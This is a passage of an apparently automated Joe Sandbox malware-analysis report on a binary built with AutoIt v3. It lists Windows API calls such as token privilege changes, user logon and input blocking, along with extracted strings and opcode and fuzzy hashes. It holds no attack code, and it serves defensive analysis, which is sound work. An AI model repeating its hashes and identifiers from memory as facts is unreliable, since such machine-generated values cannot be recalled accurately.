                                                                  • Instruction Fuzzy Hash: BDF0497190020DABDB00CF94C805BFEBBB4FF04315F10804AF95596292D7799A15EF94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00F49B52,?,00F6098C,?), ref: 00F3A6DA
                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00F49B52,?,00F6098C,?), ref: 00F3A6EC
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFormatLastMessage
                                                                  • String ID:
                                                                  • API String ID: 3479602957-0
                                                                  • Opcode ID: 91541bb87a444130e3e886a0c1f3f9f4ea8c6603a623e82793390c5a6afeb09a
                                                                  • Instruction ID: b59ec9d0b52f37fedd3fa3c9732d1946993b2f8479661102af6fa41cc017a4b2
                                                                  • Opcode Fuzzy Hash: 91541bb87a444130e3e886a0c1f3f9f4ea8c6603a623e82793390c5a6afeb09a
                                                                  • Instruction Fuzzy Hash: ECF0A73550422DBBDB20AFA5CC49FEA77ACFF09361F008155F918D7291DA709944DBE1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F28F27), ref: 00F28DFE
                                                                  • CloseHandle.KERNEL32(?,?,00F28F27), ref: 00F28E10
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                  • String ID:
                                                                  • API String ID: 81990902-0
                                                                  • Opcode ID: 0a486fec46a42eb96bed54b449ca0535d98511306e91785ffddc872eb8d3b707
                                                                  • Instruction ID: 257a0d35c9097a03685b36cef622d461bfce7b776f4f19a165cbf583cb1d2dab
                                                                  • Opcode Fuzzy Hash: 0a486fec46a42eb96bed54b449ca0535d98511306e91785ffddc872eb8d3b707
                                                                  • Instruction Fuzzy Hash: 51E04F32010614FFE7262B50EC09E7777EDEB003107208819F56990470CF626C90EB10
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00EF8F87,?,?,?,00000001), ref: 00EFA38A
                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00EFA393
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: 0090646dbfffb1b0d3bb0ef201c7c265747b5df481b17502edb803491b88347a
                                                                  • Instruction ID: a098172d128704aae22e8a5936883b4fea3adb67820c3eeff6ab357228efb602
                                                                  • Opcode Fuzzy Hash: 0090646dbfffb1b0d3bb0ef201c7c265747b5df481b17502edb803491b88347a
                                                                  • Instruction Fuzzy Hash: 7AB0923106420CABCA402B91EC0AB8A3F68EB44A63F104010F61D44262EFE25450AA91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • BlockInput.USER32(00000001), ref: 00F445F0
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: BlockInput
                                                                  • String ID:
                                                                  • API String ID: 3456056419-0
                                                                  • Opcode ID: e2429feb2560ec0da5866dec53b96cf023cb0718dec6f9aea0f821f2e66a07f7
                                                                  • Instruction ID: 1a3de192e66b6ec252bbfff95f0d9b7705e963b65917449603b46bbae82eab4c
                                                                  • Opcode Fuzzy Hash: e2429feb2560ec0da5866dec53b96cf023cb0718dec6f9aea0f821f2e66a07f7
                                                                  • Instruction Fuzzy Hash: 65E092322001055FD700AF59D400A46BBE8EF54760B048416FC05E7350DE70B8018B90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: mouse_event
                                                                  • String ID:
                                                                  • API String ID: 2434400541-0
                                                                  • Opcode ID: fd6b6d3cb01a5ce5abf89dff5b003356422d28b80ed3305b5e852e8106d46f90
                                                                  • Instruction ID: 4280fe893ebdaa5b740334f10e7828185a9080e65106afb86fe853be5af02f4e
                                                                  • Opcode Fuzzy Hash: fd6b6d3cb01a5ce5abf89dff5b003356422d28b80ed3305b5e852e8106d46f90
                                                                  • Instruction Fuzzy Hash: C1D092A6560E0A79ED5827249E1FF772608E381FF1F994749B142890C2EDD4EC85B432
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00F28FA7), ref: 00F29389
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: LogonUser
                                                                  • String ID:
                                                                  • API String ID: 1244722697-0
                                                                  • Opcode ID: 5d6c247c1268ae25dfc368f262240666f954586457e6428713627e7775b82347
                                                                  • Instruction ID: e78b4571eacd4122ee2f9c1d4f8e9091ff99339db57bac0110eca88b750a810a
                                                                  • Opcode Fuzzy Hash: 5d6c247c1268ae25dfc368f262240666f954586457e6428713627e7775b82347
                                                                  • Instruction Fuzzy Hash: DFD05E3226050EBBEF018EA4DD01EAF3B69EB04B01F408111FE25C50A0C775D835AB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 00F10734
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: NameUser
                                                                  • String ID:
                                                                  • API String ID: 2645101109-0
                                                                  • Opcode ID: b4fbea74fc7eaa8e0877b146165ddae40a483509b2d459dc4973a3df48e3a95e
                                                                  • Instruction ID: 9307fc33777a553f67579d617b2687d626a451bf5b95047ac33af2a315d4a9a7
                                                                  • Opcode Fuzzy Hash: b4fbea74fc7eaa8e0877b146165ddae40a483509b2d459dc4973a3df48e3a95e
                                                                  • Instruction Fuzzy Hash: 0BC04CF280010DDBCB05DBA0D998EEF77BCBB08304F200455E115B2100DBB49B849A71
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00EFA35A
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: 9d37d979bc1b3649c677aadd1b6d0ac938a988dba0cc360f624561c272adbe48
                                                                  • Instruction ID: 8a7179279f1491f1b9fdab1ee1f52bcafe047adb2639f61f9437a2673d5bd485
                                                                  • Opcode Fuzzy Hash: 9d37d979bc1b3649c677aadd1b6d0ac938a988dba0cc360f624561c272adbe48
                                                                  • Instruction Fuzzy Hash: 7FA0243001010CF7CF001F41FC054457F5CD7001517004010F40C00133DF73541055C0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 00F47F45
                                                                  • DeleteObject.GDI32(00000000), ref: 00F47F57
                                                                  • DestroyWindow.USER32 ref: 00F47F65
                                                                  • GetDesktopWindow.USER32 ref: 00F47F7F
                                                                  • GetWindowRect.USER32 ref: 00F47F86
                                                                  • SetRect.USER32 ref: 00F480C7
                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00F480D7
                                                                  • CreateWindowExW.USER32 ref: 00F4811F
                                                                  • GetClientRect.USER32(00000000,?), ref: 00F4812B
                                                                  • CreateWindowExW.USER32 ref: 00F48165
                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F48187
                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F4819A
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F481A5
                                                                  • GlobalLock.KERNEL32 ref: 00F481AE
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F481BD
                                                                  • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F481C6
                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F481CD
                                                                  • GlobalFree.KERNEL32 ref: 00F481D8
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F481EA
                                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00F63C7C,00000000), ref: 00F48200
                                                                  • GlobalFree.KERNEL32 ref: 00F48210
                                                                  • CopyImage.USER32 ref: 00F48236
                                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00F48255
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F48277
                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F48464
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                  • API String ID: 2211948467-2373415609
                                                                  • Opcode ID: a288b8c74f40368d64a18058de83e15fcfb0e1cf34a2ef2f788ce853866e5377
                                                                  • Instruction ID: adedec26e3fa1780c0a14f3631b2b4ec875d303e0b779b76179b200ef6cb5c07
                                                                  • Opcode Fuzzy Hash: a288b8c74f40368d64a18058de83e15fcfb0e1cf34a2ef2f788ce853866e5377
                                                                  • Instruction Fuzzy Hash: 2A028C71910209EFDB14DF68CD89EAF7BB9EF48310F148559F915AB2A1CB70AD02DB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?,00F60980), ref: 00F53C65
                                                                  • IsWindowVisible.USER32(?), ref: 00F53C89
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpperVisibleWindow
                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                  • API String ID: 4105515805-45149045
                                                                  • Opcode ID: 3f01d6beeee11e6d4eb11951bf927baed772b53eb4c246a6c040ac8f1e5fac14
                                                                  • Instruction ID: 0a992124115bc01f67e1c555ad253e40c8b28ca7676701f72b8ab3a6c80eba56
                                                                  • Opcode Fuzzy Hash: 3f01d6beeee11e6d4eb11951bf927baed772b53eb4c246a6c040ac8f1e5fac14
                                                                  • Instruction Fuzzy Hash: A5D183302042158BCB14EF14D851AAAB7E1EF94395F204458FE566B3E3CB36ED4EEB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetTextColor.GDI32(?,00000000), ref: 00F5AC55
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00F5AC86
                                                                  • GetSysColor.USER32(0000000F), ref: 00F5AC92
                                                                  • SetBkColor.GDI32(?,000000FF), ref: 00F5ACAC
                                                                  • SelectObject.GDI32(?,?), ref: 00F5ACBB
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00F5ACE6
                                                                  • GetSysColor.USER32(00000010), ref: 00F5ACEE
                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00F5ACF5
                                                                  • FrameRect.USER32 ref: 00F5AD04
                                                                  • DeleteObject.GDI32(00000000), ref: 00F5AD0B
                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00F5AD56
                                                                  • FillRect.USER32 ref: 00F5AD88
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00F5ADB3
                                                                    • Part of subcall function 00F5AF18: GetSysColor.USER32(00000012), ref: 00F5AF51
                                                                    • Part of subcall function 00F5AF18: SetTextColor.GDI32(?,?), ref: 00F5AF55
                                                                    • Part of subcall function 00F5AF18: GetSysColorBrush.USER32(0000000F), ref: 00F5AF6B
                                                                    • Part of subcall function 00F5AF18: GetSysColor.USER32(0000000F), ref: 00F5AF76
                                                                    • Part of subcall function 00F5AF18: GetSysColor.USER32(00000011), ref: 00F5AF93
                                                                    • Part of subcall function 00F5AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F5AFA1
                                                                    • Part of subcall function 00F5AF18: SelectObject.GDI32(?,00000000), ref: 00F5AFB2
                                                                    • Part of subcall function 00F5AF18: SetBkColor.GDI32(?,00000000), ref: 00F5AFBB
                                                                    • Part of subcall function 00F5AF18: SelectObject.GDI32(?,?), ref: 00F5AFC8
                                                                    • Part of subcall function 00F5AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00F5AFE7
                                                                    • Part of subcall function 00F5AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F5AFFE
                                                                    • Part of subcall function 00F5AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00F5B013
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                  • String ID:
                                                                  • API String ID: 4124339563-0
                                                                  • Opcode ID: 6762bf8bbc30191d429340b83fbf0373573917b1cc50702296ada67f611e9793
                                                                  • Instruction ID: 36d630922aef2bdbaa6f74cdee10461bc71fd89055ad61862f5c639334878bb5
                                                                  • Opcode Fuzzy Hash: 6762bf8bbc30191d429340b83fbf0373573917b1cc50702296ada67f611e9793
                                                                  • Instruction Fuzzy Hash: F4A18172408305BFD7119F64DC08A6B7BA9FF49322F240B19FA62961A0DBB1D854EF52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • DestroyWindow.USER32(?,?,?), ref: 00ED3072
                                                                  • DeleteObject.GDI32(00000000), ref: 00ED30B8
                                                                  • DeleteObject.GDI32(00000000), ref: 00ED30C3
                                                                  • DestroyIcon.USER32(00000000,?,?,?), ref: 00ED30CE
                                                                  • DestroyWindow.USER32(00000000,?,?,?), ref: 00ED30D9
                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00F0C77C
                                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F0C7B5
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F0CBDE
                                                                    • Part of subcall function 00ED1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00ED2412,?,00000000,?,?,?,?,00ED1AA7,00000000,?), ref: 00ED1F76
                                                                  • SendMessageW.USER32(?,00001053), ref: 00F0CC1B
                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F0CC32
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00F0CC48
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00F0CC53
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                  • String ID: 0
                                                                  • API String ID: 464785882-4108050209
                                                                  • Opcode ID: 2ad1321d0f69c87df109b186ff121becc8ff2b1f00f56be8b7702bf533426129
                                                                  • Instruction ID: ed5bf8fe971cfceaa2f3da0829e827499cafee6132f4b1edf53f061477a08d04
                                                                  • Opcode Fuzzy Hash: 2ad1321d0f69c87df109b186ff121becc8ff2b1f00f56be8b7702bf533426129
                                                                  • Instruction Fuzzy Hash: A2129170604201EFDB14DF24C894BA6B7E1FF44310F14866AF555DB2A2C771ED46EB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                  • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                  • API String ID: 2660009612-1645009161
                                                                  • Opcode ID: 7751e8ff9d63e72466f41864767d658d085ceb67adca915ecdb458acd0b17483
                                                                  • Instruction ID: eb2843477dbc1b3abfe538e950dc76c14f4f896e3a33066ff33abccf8a929e73
                                                                  • Opcode Fuzzy Hash: 7751e8ff9d63e72466f41864767d658d085ceb67adca915ecdb458acd0b17483
                                                                  • Instruction Fuzzy Hash: 94A19F31A0024DABCB14AF22DC42EBE77B8AF44740F14506DFA05BB292EBB1DA45E751
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • DestroyWindow.USER32(00000000), ref: 00F47BC8
                                                                  • SystemParametersInfoW.USER32 ref: 00F47C87
                                                                  • SetRect.USER32 ref: 00F47CC5
                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00F47CD7
                                                                  • CreateWindowExW.USER32 ref: 00F47D1D
                                                                  • GetClientRect.USER32(00000000,?), ref: 00F47D29
                                                                  • CreateWindowExW.USER32 ref: 00F47D6D
                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F47D7C
                                                                  • GetStockObject.GDI32(00000011), ref: 00F47D8C
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00F47D90
                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00F47DA0
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F47DA9
                                                                  • DeleteDC.GDI32(00000000), ref: 00F47DB2
                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?,?,50000000), ref: 00F47DDE
                                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00F47DF5
                                                                  • CreateWindowExW.USER32 ref: 00F47E30
                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F47E44
                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00F47E55
                                                                  • CreateWindowExW.USER32 ref: 00F47E85
                                                                  • GetStockObject.GDI32(00000011), ref: 00F47E90
                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F47E9B
                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00F47EA5
                                                                  Strings
                                                                  Memory Dump Source
